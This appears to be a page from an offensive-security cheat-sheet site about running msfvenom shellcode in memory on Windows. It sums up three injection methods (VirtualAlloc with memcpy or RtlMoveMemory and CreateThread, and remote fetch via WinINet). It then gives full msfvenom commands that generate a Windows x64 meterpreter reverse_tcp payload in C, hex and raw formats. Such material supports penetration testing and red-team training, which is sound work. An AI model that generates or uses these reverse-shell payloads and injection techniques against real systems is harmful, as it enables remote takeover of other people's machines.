🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / Shellcode Execution Overview

Shellcode Execution Overview

Three primary methods for executing msfvenom shellcode in memory on Windows:

Method Language Use Case
VirtualAlloc + memcpy + function pointer C/C++ Compiled implant
VirtualAlloc + RtlMoveMemory + CreateThread Python + ctypes Script-based
Remote URL fetch + VirtualAlloc C++ + WinINet Stageless remote load

All three use the same primitive: allocate RWX memory, copy shellcode, execute.

Generate shellcode for injection

# C array
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f c

# Hex string (for read-from-file or HTTP serve)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f hex -o sc.hex

# Raw binary
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o sc.bin